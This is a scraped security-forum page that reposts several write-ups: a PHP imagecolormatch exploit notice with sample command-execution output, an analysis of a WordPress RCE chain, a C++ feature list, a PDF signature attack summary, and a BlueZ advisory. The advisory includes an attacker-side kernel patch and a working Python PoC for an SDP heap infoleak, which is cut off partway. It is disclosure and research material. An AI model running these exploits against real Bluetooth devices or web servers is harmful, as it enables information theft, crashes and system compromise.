  6. imagecolormatch() OOB Heap Write exploit Info My binary exploit for CVE-2019-6977. Bug found by Simon Scannell from RIPS. PHP bug is here. Helps you bypass PHP's disable_functions INI directive. I commented a lot to help people that are new to binary PHP exploitation. Hope this helps. Output GET http://target.com/exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi Nenuphar.ce: 0x7fe834a10018 Nenuphar2.ce: 0x7fe834a10d70 Nenuphar.properties: 0x7fe834a01230 z.val: 0x7fe834aaea18 Difference: 0xad7e8 Exploit SUCCESSFUL ! Sursa: https://github.com/cfreal/exploits/tree/master/CVE-2019-6977-imagecolormatch
  7. Analyzing WordPress Remote Code Execution Vulnerabilities CVE-2019-8942 and CVE-2019-8943 Posted on:February 26, 2019 at 7:24 am Posted in:Exploits, Vulnerabilities Author: Trend Micro by Suraj Sahu and Jayesh Patel (Vulnerability Researchers) With its open-source, feature-rich, and user-friendly content management system (CMS), WordPress powers nearly 33 percent of today’s websites. This popularity is also what makes them an obvious cybercriminal target. All it could take is a vulnerability to gain a foothold on a website’s sensitive data. This could be compounded by security issues that can be brought by outdated websites or use of unsecure third-party plugins or components. On February 19, 2019, Simon Scannell of RIPS Technologies published his findings on core vulnerabilities in WordPress that can lead to remote code execution (RCE). These have been assigned as CVE-2019-8942 and CVE-2019-8943. In a nutshell, these security flaws, when successfully exploited, could enable attackers with at least author privileges to execute hypertext preprocessor (PHP) code and gain full system control. Affected versions of WordPress include versions 5 (prior to 5.0.1) and 4 (prior to 4.9.9). The vulnerabilities have also been disclosed to WordPress’ security team. This blog post expounds the technical details of the vulnerabilities, specifically, how a potential attack could look like and the parameters that are added to take advantage of a vulnerable WordPress site. Vulnerability analysis and attack chain An attacker with author privileges can upload PHP code embedded in an image file to a WordPress site. The uploaded file will get saved in the wp-content/uploads folder; an entry of this file will also be saved in the database’s postmeta table. Figure 1. Screenshot showing how CVE-2019-8942 could be exploited By exploiting CVE-2019-8942, an attacker can modify the _wp_attached_file meta_key (used to retrieve a value saved from the database and display it) to an arbitrary value. Exploiting the vulnerability requires sending the crafted post an edit request. A benign request typically would not have a file parameter in the request. An attacker-crafted request can have a file parameter that allows hackers to update the _wp_attached_file meta_key. As shown in Figure 3, the same can also be observed in the database table. Figure 2. Screenshot showing how an especially crafted PHP file is embedded (highlighted) Figure 3. Screenshot showing a modified file name in the database (highlighted) Patched versions of WordPress (before 4.9.9 and 5.0.1) do not have checks to validate which MetaData fields are going to get updated through a request. Attackers could take advantage of this to update or alter the _wp_attached_file meta_key value to an arbitrary one. In the patched versions, the new function _wp_get_allowed_postdata() in admin/includes/post.php was added to check if “file”, “meta_input” or “guid” are sent in the edit request and removed before updating the POST request. Figure 3 shows that exploiting CVE-2019-8942 can let hackers modify the file name in the database akin to a path traversal (e.g., evil1.jpg?../and ../evil1.jpg). An attacker can chain the exploit of CVE-2019-8942 with another, this time exploiting CVE-2019-8943. The latter can let attackers move the uploaded file to an arbitrary directory where the embedded PHP code can get executed successfully. Figure 4 shows what CVE-2019-8943 entails. In the wp_crop_image function (which lets WordPress users crop images to a given size or resolution) in wp-admin/includes/image.php doesn’t validate the .dst (a drawing sheet file) file path before the saving the file. Figure 4. Screenshot showing the wp_crop_image function not validating .dst file path Figure 5. How the wp_crop_image function tries to access the file locally In a possible attack scenario, once the file name in meta_key is modified, the file (e.g., evil1.jpg?../and ../evil1.jpg in Figure 3) will not be found in the upload directory. Hence, it will fall back to the next If condition in the wp_crop_image function where it will try to access the file by URL. It requires file replication plugins to be installed in the WordPress site. The request will look something like this: hxxps[:]//vulenrablewesbite/wp-content/uploads/evil1.jpg?../../evil1.jpg While loading the image, it will ignore the path after “?” and the image will be loaded successfully. An attacker will crop the image, and while saving, it will follow the path traversal and save it in an arbitrary directory. Caveats and best practices Patching CVE-2019-8942 makes CVE-2019-8943 non-exploitable, as the former plays an essential part in successfully exploiting the latter. That’s because the meta_key in _wp_attached_file first needs to be updated or modified to a path traversal file name before it can execute an embedded PHP code. More importantly, these vulnerabilities highlight the importance for developers to practice security by design, and for administrators to adopt security hygiene to reduce their website’s attack surface. Regularly update the CMS or employ virtual patching to address vulnerabilities for which patches are not yet available and on systems that need to be constantly up and running. Consistently vet the website and its infrastructure or components against exploitable vulnerabilities. Enforce the principle of least privilege, and disable or delete outdated or vulnerable plugins. The Trend Micro Deep Security™ solution protects user systems from threats that might exploit CVE-2019-8942 and CVE-2019-8943 via the following deep packet inspection (DPI) rules: 1005933 – Identified Directory Traversal Sequence In Uri Query 1009544 – WordPress Image Remote Code Execution Vulnerability (CVE-2019-8942) Trend Micro™ TippingPoint™ customers are protected from these vulnerabilities via this MainlineDV filter: 34573 – HTTP: WordPress 5.0.0 File Inclusion Vulnerability 34578 – HTTP: WordPress Image Remote Code Execution Vulnerability Sursa: https://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-wordpress-remote-code-execution-vulnerabilities-cve-2019-8942-and-cve-2019-8943/
  8. Nytro

    C++17/14/11

    C++17/14/11 Overview Many of these descriptions and examples come from various resources (see Acknowledgements section), summarized in my own words. Also, there are now dedicated readme pages for each major C++ version. C++17 includes the following new language features: template argument deduction for class templates declaring non-type template parameters with auto folding expressions new rules for auto deduction from braced-init-list constexpr lambda lambda capture this by value inline variables nested namespaces structured bindings selection statements with initializer constexpr if utf-8 character literals direct-list-initialization of enums C++17 includes the following new library features: std::variant std::optional std::any std::string_view std::invoke std::apply std::filesystem std::byte splicing for maps and sets parallel algorithms C++14 includes the following new language features: binary literals generic lambda expressions lambda capture initializers return type deduction decltype(auto) relaxing constraints on constexpr functions variable templates C++14 includes the following new library features: user-defined literals for standard library types compile-time integer sequences std::make_unique C++11 includes the following new language features: move semantics variadic templates rvalue references forwarding references initializer lists static assertions auto lambda expressions decltype template aliases nullptr strongly-typed enums attributes constexpr delegating constructors user-defined literals explicit virtual overrides final specifier default functions deleted functions range-based for loops special member functions for move semantics converting constructors explicit conversion functions inline-namespaces non-static data member initializers right angle brackets C++11 includes the following new library features: std::move std::forward std::thread std::to_string type traits smart pointers std::chrono tuples std::tie std::array unordered containers std::make_shared memory model std::async Sursa: https://github.com/AnthonyCalandra/modern-cpp-features
      • 1
      • Upvote
  9. How to break PDF Signatures If you open a PDF document and your viewer displays a panel (like you see below) indicating that the document is signed by invoicing@amazon.de and the document has not been modified since the signature was applied You assume that the displayed content is precisely what invoicing@amazon.de has created. During recent research, we found out that this is not the case for almost all PDF Desktop Viewers and most Online Validation Services. So what is the problem? With our attacks, we can use an existing signed document (e.g., amazon.de invoice) and change the content of the document arbitrarily without invalidating the signatures. Thus, we can forge a document signed by invoicing@amazon.de to refund us one trillion dollars. To detect the attack, you would need to be able to read and understand the PDF format in depth. Most people are probably not capable of such thing (PDF file example). To recap this, you can use any signed PDF document and create a document which contains arbitrary content in the name of the signing user, company, ministry or state. Important: To verify the signature you need to trust the amazon.de certificate, which you would if you get signed PDFs from Amazon, otherwise the signature is still valid, but the certificate is not trusted. Furthermore, due to our responsible disclosure process, most applications already implemented countermeasure against our attack, you can find a vulnerable Adobe Acrobat DC Reader version here. Who uses PDF Signatures? Since 2014, organizations delivering public digital services in an EU member state are required to support digitally signed documents such as PDF files by law (eIDAS). In Austria, every governmental authority digitally signs any document §19. Also, any new law is legally valid after its announcement within a digitally signed PDF. Several countries like Brazil, Canada, the Russian Federation, and Japan also use and accept digitally signed documents. The US government protects PDF files with PDF signatures, and individuals can report tax withholdings by signing and submitting a PDF. Outside Europe, Forbes calls the electronic signature and digital transactions company DocuSign as No. 4 in its Cloud 100 list. Many companies sign every document they deliver (e.g., Amazon, Decathlon, Sixt). Standardization documents, such as ISO and DIN, are also protecting by PDF signatures. Even in the academic world, PDF signatures are sometimes used to sign scientific papers (e.g., ESORICS proceedings). According to Adobe Sign, the company processed 8 billion electronic and digital signatures in 2017 alone. Currently, we are not aware of any exploits using our attacks. How bad is it? We evaluated our attacks against two types of applications. The commonly known desktop applications everyone uses on a daily bases and online validation services. The last one is often used in the business world to validate the signature of a PDF document returning a validation report as a result. During our research, we identified 21 out of 22 desktop viewer applications and 5 out of 7 online validation services vulnerable against at least one of our attacks. You can find the detailed results of our evaluation on the following web pages: Desktop Viewer Applications Online Validation Services How can I protect myself? As part of our research, we started a responsible disclosure procedure on 9th October 2018, after we identified 21 out 22 desktop viewer applications and 5 out of 7 online validation services vulnerable against at least one of our attacks. In cooperation with the BSI-CERT, we contacted all vendors, provided proof-of-concept exploits, and helped them to fix the issues. You can take a look at which PDF Reader you are using and compare the versions. If you use one of our analyzed Desktop Viewer Applications you already should have got an update for you Reader. My PDF Reader is not listed If you use another Reader, you should contact the support team for your application. Continue reading Sursa: https://www.pdf-insecurity.org/
      • 2
      • Upvote
      • Like
  10. SSD Advisory – Linux BlueZ Information Leak and Heap Overflow February 25, 2019 (This advisory follows up on a presentation provided during our offensive security event in 2018 in Hong Kong – come join us at TyphoonCon – June 2019 in Seoul for more offensive security lectures and training) Vulnerabilities Summary The following advisory discuss about two vulnerabilities found in Linux BlueZ bluetooth module. One of the core ideas behind Bluetooth is allowing interoperability between a wide range of devices from different manufacturers. This is one of the reasons that the Bluetooth specification is extremely long and complex. Detailed descriptions of a wide range of protocols that support all common use-cases ensure that different Bluetooth implementations can work together. However, from an attackers point of view this also means that there is a lot of unneeded complexity in the Bluetooth stack which provides a large attack surface. Due to the modular nature of Bluetooth, some critical features such as packet fragmentation are found redundantly in multiple protocols that are part of the Bluetooth core specification. This makes correct implementation very complicated and increases the likelihood of security issues. Vendor Response We have contacted the Bluez maintainer on 23/8/2018 and sent a report describing the two vulnerabilities. The vendor responded “I got the message and was able to decrypt it, but frankly I don’t know when I get to look at it at confirm the issue.”. We have sent few more emails to the vendor since the first report and also proposed patches for the vulnerabilities but no fix has been issued until the day of writing this post. Proposed patches have been provided by, Luiz Augusto von Dentz, at the bottom of this advisory. CVE CVE-2019-8921 CVE-2019-8922 Credit An independent security researcher, Julian Rauchberger, has reported this vulnerability to SSD Secure Disclosure program. Affected systems Linux systems with BlueZ module with versions 5.17-5.48 (latest at the time of writing this advisory) Vulnerability Details To support the huge range of potential use cases for Bluetooth, the specification describes many different protocols. For the vulnerabilities detailed in this advisory, we will focus on two core protocols: L2CAP and SDP. L2CAP Simply speaking, L2CAP can be seen as the TCP layer of Bluetooth. It is responsible for implementing low-level features such as multiplexing and flow control. What would be called a “port” in TCP is the “Protocol/Service Multiplexer” (PSM) value in L2CAP. Authentication and Authorization is generally handled on higher layers, meaning that an attacker can open a L2CAP connection to any PSM they want and send whatever crafted packets they wish. From a technical point of view, BlueZ implements L2CAP inside the kernel as a module. SDP SDP is the Service Discovery Protocol. It is implemented above L2CAP as a “service” running on PSM 0x0001. Since the PSM is only a 16-bit number, it is not possible to assign a unique PSM to every Bluetooth service imaginable. SDP can translate globally unique UUIDs to a dynamic PSM used on a specific device. For instance, a vendor specific service has the same UUID on all devices but might run on PSM 0x0123 on device A and PSM 0x0456 on device B. It is the job of SDP to provide this information to devices that wish to connect to the service. Example * Device A opens a L2CAP connection to PSM 0x0001 (SDP) on device B * Device A asks “what is the PSM for the service with UUID 0x12345678?” * Device B responds with “PSM 0x1337” * Device A opens an L2CAP connection to PSM 0x1337 SDP is also used to advertise all the Bluetooth Profiles (services/features) a device supports. It can be queried to send a list of all services running on the device as well as their attributes (mostly simple key/value pairs). The SDP protocol is implemented in a userspace daemon by BlueZ. Since it requires high privileges, this daemon normally runs as root, meaning vulnerabilities should result in full system compromise in most cases. PoC’s and Testing Environment The PoC’s attached at the end of this advisory have been tested against BlueZ 5.48 (the newest version at the time of writing), BlueZ 5.17 (a very old version from 2014), as well as a few in between. The PoC’s have been written for Python 2.7 and have two dependencies, please install them first: * pybluez (to send Bluetooth packets) * pwntools (for easier crafting of packets and hexdump()) run them with: python sdp_infoleak_poc.py TARGET=XX:XX:XX:XX:XX:XX python sdp_heapoverflow_poc.py TARGET=XX:XX:XX:XX:XX:XX (where XX:XX:XX:XX:XX:XX is the Bluetooth MAC address of the victim device) Please ensure that the Bluetooth is activated and the device is discoverable (called “visible” in most of the GUIs) It might be necessary to update the SERVICE_REC_HANDLE and/or SERVICE_ATTR_ID to get the PoC’s to work. These values can differ between devices. They are advertised by SDP so it could be automated to find them but we didn’t implemented that. Detailed information is inside the comments of the PoC’s. Vulnerability 1: SDP infoleak Note: All line numbers and filenames referenced here were taken from BlueZ 5.48 which is the newest version at the time of writing. The vulnerability lies in the handling of a SVC_ATTR_REQ by the SDP implementation of BlueZ. By crafting a malicious CSTATE, it is possible to trick the server into returning more bytes than the buffer actually holds, resulting in leaking arbitrary heap data. Background This vulnerability demonstrates very well issues arising due to the aforementioned complexity caused by the redundant implementation of some features in multiple protocols. Even though L2CAP already provides sufficient fragmentation features, SDP defines its own. However, incorrect implementation in BlueZ leads to a significant information leak. One of the features of SDP is to provide the values of custom attributes a service might have. The client sends the ID of an attribute and SDP responds with the corresponding value. If the response to an attribute request is too large to fit within a single SDP packet, a “Continuation State” (cstate) is created. Here is how it should work in theory: client sends an attribute request server sees that the response is too large to fit in the reply server appends arbitrary continuation state data to the response client recognizes this means the response is not complete yet client sends the same request again, this time including the continuation state data sent by the server server responds with the rest of the data According to the specification, the cstate data can be arbitrary data, basically whatever the specific implementation wants and the client is required to send the same request again, including the cstate data sent by the server. The implementation of this mechanism in BlueZ is flawed. A malicious client can manipulate the cstate data it sends in the second request. The server does not check this and simply trusts that the data is the same. This leads to an infloleak described in the next section. Root cause analysis The root cause can be found in the function service_attr_req on line 633 of src/sdpd-request.c 721 if (cstate) { 722 sdp_buf_t *pCache = sdp_get_cached_rsp(cstate); 723 724 SDPDBG("Obtained cached rsp : %p", pCache); 725 726 if (pCache) { 727 short sent = MIN(max_rsp_size, pCache->data_size - cstate->cStateValue.maxBytesSent); 728 pResponse = pCache->data; 729 memcpy(buf->data, pResponse + cstate->cStateValue.maxBytesSent, sent); 730 buf->data_size += sent; 731 cstate->cStateValue.maxBytesSent += sent; 732 733 SDPDBG("Response size : %d sending now : %d bytes sent so far : %d", 734 pCache->data_size, sent, cstate->cStateValue.maxBytesSent); 735 if (cstate->cStateValue.maxBytesSent == pCache->data_size) 736 cstate_size = sdp_set_cstate_pdu(buf, NULL); 737 else 738 cstate_size = sdp_set_cstate_pdu(buf, cstate); 739 } else { 740 status = SDP_INVALID_CSTATE; 741 error("NULL cache buffer and non-NULL continuation state"); 742 } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 721 if (cstate) { 722 sdp_buf_t *pCache = sdp_get_cached_rsp(cstate); 723 724 SDPDBG("Obtained cached rsp : %p", pCache); 725 726 if (pCache) { 727 short sent = MIN(max_rsp_size, pCache->data_size - cstate->cStateValue.maxBytesSent); 728 pResponse = pCache->data; 729 memcpy(buf->data, pResponse + cstate->cStateValue.maxBytesSent, sent); 730 buf->data_size += sent; 731 cstate->cStateValue.maxBytesSent += sent; 732 733 SDPDBG("Response size : %d sending now : %d bytes sent so far : %d", 734 pCache->data_size, sent, cstate->cStateValue.maxBytesSent); 735 if (cstate->cStateValue.maxBytesSent == pCache->data_size) 736 cstate_size = sdp_set_cstate_pdu(buf, NULL); 737 else 738 cstate_size = sdp_set_cstate_pdu(buf, cstate); 739 } else { 740 status = SDP_INVALID_CSTATE; 741 error("NULL cache buffer and non-NULL continuation state"); 742 } The main issue here is in line 727 where BlueZ calculates how many bytes should be sent to the client. The value of max_rsp_size can be controlled by the attacker but normally the MIN function should ensure that it cannot be larger than than the actual bytes available. The vulnerability is that we can cause an underflow when calculating (pCache->data_size – cstate->cStateValue.maxBytesSent) which causes that value to be extremely high when interpreted as an unsigned integer. MIN will then return whatever we sent as max_rsp_size since it is smaller than the result of the underflow. pCache->data_size is how large the initially generated response has been. cstate->cStateValue.maxBytesSent is directly read from the cstate we sent to the server. So we can set it to any value we want. If we set maxBytesSent to a value higher than data_size, we trigger an underflow that allows us to cause MIN() to return our max_rsp_size which lets us set “sent” to any value we want. The memcpy in line 729 will then copy all that data to the response buffer which later gets sent to us. Since “sent” is a signed short, we have two possible ways to exploit this: If we set sent to value <= 0x7FFF it is treated as a positive integer and we will get sent this amount of bytes back. If we set it to 0x8000 or larger it will be treated as a negative value, meaning zero expansion will fill all the most significant bits with 1, resulting in a extremely large copy operation in line 729 that is guaranteed to crash the program. So this vulnerability can be either used as a infoleak to leak up 0x7FFF bytes or as a Denial of Service that crashes the bluetooth application. Triggering the vulnerability To trigger this vulnerability, we first send a legitimate attribute request to the server. In our request, we can specify how many bytes we are willing to accept within a single response packet. Since we already know how large the response will be, we set this so the response will be one byte too large. This results in the server storing that there is one byte left it hadn’t sent us yet. The server also sends us a cstate that contains how many bytes it has already sent us. For simplicity, we call this value the “offset”. Then we send the same request again, but we increase the “offset” contained in the cstate to create the underflow described above. For detailed documentation about how the packets we send look exactly, please refer to the comments in the Python PoC file. Vulnerability 2: SDP Heap Overflow Like the information leak, this vulnerability lies in the SDP protocol handling of attribute requests as well. By requesting a huge number of attributes at the same time, an attacker can overflow the static buffer provided to hold the response. Normally, it would not be possible to request so many attributes but we will demonstrate a trick that allows us to do so. Root cause analysis In the same function service_attr_req of src/sdpd-request.c, in line 745 the function extract_attrs is called. 744 sdp_record_t *rec = sdp_record_find(handle); 745 status = extract_attrs(rec, seq, buf); 746 if (buf->data_size > max_rsp_size) { 747 sdp_cont_state_t newState; 748 749 memset((char *)&newState, 0, 1 2 3 4 5 6 744 sdp_record_t *rec = sdp_record_find(handle); 745 status = extract_attrs(rec, seq, buf); 746 if (buf->data_size > max_rsp_size) { 747 sdp_cont_state_t newState; 748 749 memset((char *)&newState, 0, This function is used to find the actual values for all the attributes requested by the client. Inside it, we find the following code: 606 for (attr = low; attr < high; attr++) { 607 data = sdp_data_get(rec, attr); 608 if (data) 609 sdp_append_to_pdu(buf, data); 610 } 611 data = sdp_data_get(rec, high); 612 if (data) 613 sdp_append_to_pdu(buf, data); 1 2 3 4 5 6 7 8 606 for (attr = low; attr < high; attr++) { 607 data = sdp_data_get(rec, attr); 608 if (data) 609 sdp_append_to_pdu(buf, data); 610 } 611 data = sdp_data_get(rec, high); 612 if (data) 613 sdp_append_to_pdu(buf, data); The important part here is that after getting the values of the attributes with sdp_data_get, they are simply appended to the buffer with sdp_append_to_pdu. The code of this function can be found in lib/sdp.c 2871 void sdp_append_to_pdu(sdp_buf_t *pdu, sdp_data_t *d) 2872 { 2873 sdp_buf_t append; 2874 2875 memset(&append, 0, sizeof(sdp_buf_t)); 2876 sdp_gen_buffer(&append, d); 2877 append.data = malloc(append.buf_size); 2878 if (!append.data) 2879 return; 2880 2881 sdp_set_attrid(&append, d->attrId); 2882 sdp_gen_pdu(&append, d); 2883 sdp_append_to_buf(pdu, append.data, append.data_size); 2884 free(append.data); 2885 } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 2871 void sdp_append_to_pdu(sdp_buf_t *pdu, sdp_data_t *d) 2872 { 2873 sdp_buf_t append; 2874 2875 memset(&append, 0, sizeof(sdp_buf_t)); 2876 sdp_gen_buffer(&append, d); 2877 append.data = malloc(append.buf_size); 2878 if (!append.data) 2879 return; 2880 2881 sdp_set_attrid(&append, d->attrId); 2882 sdp_gen_pdu(&append, d); 2883 sdp_append_to_buf(pdu, append.data, append.data_size); 2884 free(append.data); 2885 } What happens here is that an appropriately sized sdp_buf_t is created and the new data is copied into it. After that, sdp_append_to_buf is called to append this data to the buffer originally passed by extract_attrs. sdp_append_to_buf can be found in the same file, the relevant part is here: 2829 void sdp_append_to_buf(sdp_buf_t *dst, uint8_t *data, uint32_t len) 2830 { 2831 uint8_t *p = dst->data; 2832 uint8_t dtd = *p; 2833 2834 SDPDBG("Append src size: %d", len); 2835 SDPDBG("Append dst size: %d", dst->data_size); 2836 SDPDBG("Dst buffer size: %d", dst->buf_size); 2837 if (dst->data_size == 0 && dtd == 0) { 2838 /* create initial sequence */ 2839 *p = SDP_SEQ8; 2840 dst->data_size += sizeof(uint8_t); 2841 /* reserve space for sequence size */ 2842 dst->data_size += sizeof(uint8_t); 2843 } 2844 2845 memcpy(dst->data + dst->data_size, data, len); 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 2829 void sdp_append_to_buf(sdp_buf_t *dst, uint8_t *data, uint32_t len) 2830 { 2831 uint8_t *p = dst->data; 2832 uint8_t dtd = *p; 2833 2834 SDPDBG("Append src size: %d", len); 2835 SDPDBG("Append dst size: %d", dst->data_size); 2836 SDPDBG("Dst buffer size: %d", dst->buf_size); 2837 if (dst->data_size == 0 && dtd == 0) { 2838 /* create initial sequence */ 2839 *p = SDP_SEQ8; 2840 dst->data_size += sizeof(uint8_t); 2841 /* reserve space for sequence size */ 2842 dst->data_size += sizeof(uint8_t); 2843 } 2844 2845 memcpy(dst->data + dst->data_size, data, len); As we can see, there isn’t any check if there is enough space in the destination buffer. The function simply appends all data passed to it. To sum everything up, the values of all attributes that are requested will simply be appended to the output buffer. There are no size checks whatsoever, resulting in a simple heap overflow if one can craft a request where the response is large enough to overflow the preallocated buffer. service_attr_req gets called by process_request (also in src/sdpd-request.c) which also allocates the response buffer. 968 static void process_request(sdp_req_t *req) 969 { 970 sdp_pdu_hdr_t *reqhdr = (sdp_pdu_hdr_t *)req->buf; 971 sdp_pdu_hdr_t *rsphdr; 972 sdp_buf_t rsp; 973 uint8_t *buf = malloc(USHRT_MAX); 974 int status = SDP_INVALID_SYNTAX; 975 976 memset(buf, 0, USHRT_MAX); 977 rsp.data = buf + sizeof(sdp_pdu_hdr_t); 978 rsp.data_size = 0; 979 rsp.buf_size = USHRT_MAX - sizeof(sdp_pdu_hdr_t); 980 rsphdr = (sdp_pdu_hdr_t *)buf; 1 2 3 4 5 6 7 8 9 10 11 12 13 968 static void process_request(sdp_req_t *req) 969 { 970 sdp_pdu_hdr_t *reqhdr = (sdp_pdu_hdr_t *)req->buf; 971 sdp_pdu_hdr_t *rsphdr; 972 sdp_buf_t rsp; 973 uint8_t *buf = malloc(USHRT_MAX); 974 int status = SDP_INVALID_SYNTAX; 975 976 memset(buf, 0, USHRT_MAX); 977 rsp.data = buf + sizeof(sdp_pdu_hdr_t); 978 rsp.data_size = 0; 979 rsp.buf_size = USHRT_MAX - sizeof(sdp_pdu_hdr_t); 980 rsphdr = (sdp_pdu_hdr_t *)buf; On line 973, the response buffer gets allocated with size USHRT_MAX meaning it will be 2^16 bytes large. So in order to overflow this buffer we need to generate a response that is larger than 2^16 bytes. While SDP does not restrict how many attributes we can request within a single packet, we are limited by the outgoing maximum transmission unit L2CAP forces us to use. For SDP, this seems to be hardcoded as 672 bytes. So the problem in exploiting this vulnerability is that we can only send a very small request but need to generate a large response. Some attributes are rather long strings, but even by requesting the longest string we found we could not even get close to generating a response large enough. SDP also has a feature where we can not only request one attribute at a time but also a range of attributes. This requires us to only send the starting and ending IDs. SDP will then return all attributes within that range. Unfortunately, the response generated by this also wasn’t large enough. Since the limiting factor seemed to be the MTU imposed by L2CAP, after investigating further how this MTU gets set and if we can do anything about it. Normally, we can only specifiy the maximum size of incoming packets (IMTU) but not the size of packets the other side is willing to accept (OMTU). After looking at the way L2CAP handles the negotiation of these values we found that it is also possible to reject the configuration supplied by the other side. If we reject a configuration parameter, we can supply a suggestion of a better value that we would accept. If this happens for the OMTU, the BlueZ will simply accept whatever suggestion it gets sent. This allows us to force the other side to use whatever OMTU we want. Then we can send much larger SDP attribute requests, containing enough attributes to overflow the heap. In a simplified way, this is how the MTU negotiation looks like: attacker: I want to open a L2CAP connection, my MTU is 65536 victim: ok, I will send you packets up to 65536 bytes, my MTU is 672, please do not send larger packets (normally, we would be done here) attacker: that MTU is not acceptable for me, I will only open the connection if I can send you packets up to 65536 victim: ok, I will allow you to send packets up to 65536 bytes Unfortunately, Linux does not allow us to reject any MTU values so we modified the kernel on the attacker machine to implement the behavior described above. Please note that this behavior is not really a security vulnerability in itself. It does follow the specification which describes that it should be possible to reject configuration parameters and suggest acceptable ones. Normally it would not be a problem to increase MTU size, it is simply due to the heap overflow that this causes trouble. Modifying the kernel Important: only the ATTACKER has to modify their kernel. The victim kernel does not need to be modified otherwise there wasn’t a vulnerability at all. In our case, we used a Linux 4.13 kernel. Here are the required modifications: Before compiling the kernel, you need to modify l2cap_parse_conf_req in net/bluetooth/l2cap_core.c 3428 if (result == L2CAP_CONF_SUCCESS) { 3429 /* Configure output options and let the other side know 3430 * which ones we don't like. */ 3431 3432 if (mtu < L2CAP_DEFAULT_MIN_MTU) { 3433 result = L2CAP_CONF_UNACCEPT; 3434 } else if(chan->omtu != 65535){ 3435 set_bit(CONF_MTU_DONE, &chan->conf_state); 3436 printk(KERN_INFO "hax setting omtu to 65535 from %d\n",chan->omtu); 3437 chan->omtu = 65535; 3438 result = L2CAP_CONF_UNACCEPT; 3439 3440 } else { 3441 chan->omtu = mtu; 3442 set_bit(CONF_MTU_DONE, &chan->conf_state); 3443 } 3444 l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->omtu, endptr - ptr); 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 3428 if (result == L2CAP_CONF_SUCCESS) { 3429 /* Configure output options and let the other side know 3430 * which ones we don't like. */ 3431 3432 if (mtu < L2CAP_DEFAULT_MIN_MTU) { 3433 result = L2CAP_CONF_UNACCEPT; 3434 } else if(chan->omtu != 65535){ 3435 set_bit(CONF_MTU_DONE, &chan->conf_state); 3436 printk(KERN_INFO "hax setting omtu to 65535 from %d\n",chan->omtu); 3437 chan->omtu = 65535; 3438 result = L2CAP_CONF_UNACCEPT; 3439 3440 } else { 3441 chan->omtu = mtu; 3442 set_bit(CONF_MTU_DONE, &chan->conf_state); 3443 } 3444 l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->omtu, endptr - ptr); We added the “else if” that ensures we do not accept the configuration as long as the OMTU isn’t 65535. Additionally we added a printk so we can check that the branch has been triggered correctly by viewing kernel. Once you compile your modified kernel, you can run the PoC attached to this writeup. Conclusion Implementing a complete Bluetooth stack correctly is extremely challenging. There are dozens of different protocols involved which often implement the same features. This can for instance be seen with the fragmentation in SDP. All this complexity creates a huge attack surface. We have demonstrated that only within a single, commonly used protocol multiple critical issues can be found. It seems highly likely that other parts of BlueZ contain similar vulnerabilities, more research is definitely required to ensure the Linux Bluetooth stack is secure from attacks. Exploits Information leak PoC: from pwn import * import bluetooth if not 'TARGET' in args: log.info("Usage: sdp_infoleak_poc.py TARGET=XX:XX:XX:XX:XX:XX") exit() # the configuration here depends on the victim device. # Discovery could be automated but for a simple PoC it would be a bit overkill # the attacker can simply gather the required information by running # sdptool browse --xml XX:XX:XX:XX:XX:XX # on his machine (replace XX:XX:XX:XX:XX:XX with victim MAC) # I have chosen to request attributes from the Generic Access Profile # but it does not really matter as long as we can generate a response with a # size large enough to create a continuation state # on my machine, sdptool prints the following: # <attribute id="0x0000"> # <uint32 value="0x00010001" /> # </attribute> # [...] # <attribute id="0x0102"> # <text value="BlueZ" /> # </attribute> # please replace these values if they should not match your victim device # the service from which we want to request attributes (GAP) SERVICE_REC_HANDLE = 0x00010001 # the attribute we want to request (in this case, the String "BlueZ") SERVICE_ATTR_ID = 0x0102 target = args['TARGET'] # TARGET Mac address mtu = 65535 # MTU to use context.endian = 'big' # this is how many bytes we want to leak # you can set it up to 0x7FFF # if you set it to 0x8000 or higher, the victim will crash # I have experienced that with slow Bluetooth hardware, large leaks can # sometimes result in timeouts so I don't recommend to set it larger than # 0x0FFF for this PoC LEAK_BYTES = 0x0FFF # this function crafts a SDP attribute request packet # handle: the service we want to query # max_rsp_size: how many bytes we are willing to accept in a single response packet # attr: the attribute(s) we want to query # cstate: the cstate to send def sdppacket(handle, max_rsp_size, attr, cstate): # craft packet to reach vulnerable code pkt = "" pkt += p32(handle) # handle pkt += p16(max_rsp_size)# max_rsp_size # contains an attribute sequence with the length describing the attributes being 16 bit long # see extract_des function in line 113 of src/sdpd-request.c pkt += p8(0x36) # DTD (seq_type SDP_SEQ16) pkt += p16(len(attr)) # seq size, 16 bit according to DTD # attributes pkt += attr # append cstate if cstate: pkt += p8(len(cstate)) pkt += cstate else: pkt += p8(0x00) # no cstate pduhdr = "" pduhdr += p8(0x04) # pdu_id 0x04 -> SVC_ATTR_REQ (we want to send an attribute request) pduhdr += p16(0x0000) # TID, doesn't matter pduhdr += p16(len(pkt)) # plen, length of body return pduhdr + pkt if __name__ == '__main__': log.info('Creating L2CAP socket') sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) bluetooth.set_l2cap_mtu(sock, mtu) log.info('Connecting to target') sock.connect((target, 0x0001)) # connect to target on PSM 0x0001 (SDP) log.info('Sending packet to prepare serverside cstate') # the attribute we want to read attr = p8(0x09) # length of ATTR_ID (SDP_UINT16 - see lib/sdp.h) attr += p16(SERVICE_ATTR_ID) # craft the packet sdp = sdppacket( SERVICE_REC_HANDLE, # the service handle 101, # max size of the response we are willing to accept attr*10, # just request the same attribute 10 times, response will be 102 bytes large None) # no cstate for now sock.send(sdp) # receive response to first packet data = sock.recv(mtu) # parse the cstate we received from the server cstate_len_index = len(data)-9 cstate_len = u8(data[cstate_len_index], endian='little') # sanity check: cstate length should always be 8 byte if cstate_len != 8: log.error('We did not receive a cstate with the length we expected, check if the attribute ids are correct') exit(1) # the cstate contains a timestamp which is used as a "key" on the server to find the # cstate data again. We will just send the same value back timestamp = u32(data[cstate_len_index+1:cstate_len_index+5], endian='little') # offset will be the value of cstate->cStateValue.maxBytesSent when we send it back offset = u16(data[cstate_len_index+5:cstate_len_index+7], endian='little') log.info("cstate: len=%d timestamp=%x offset=%d" % (cstate_len, timestamp, offset)) if offset != 101: log.error('we expected to receive an offset of size 101, check if the 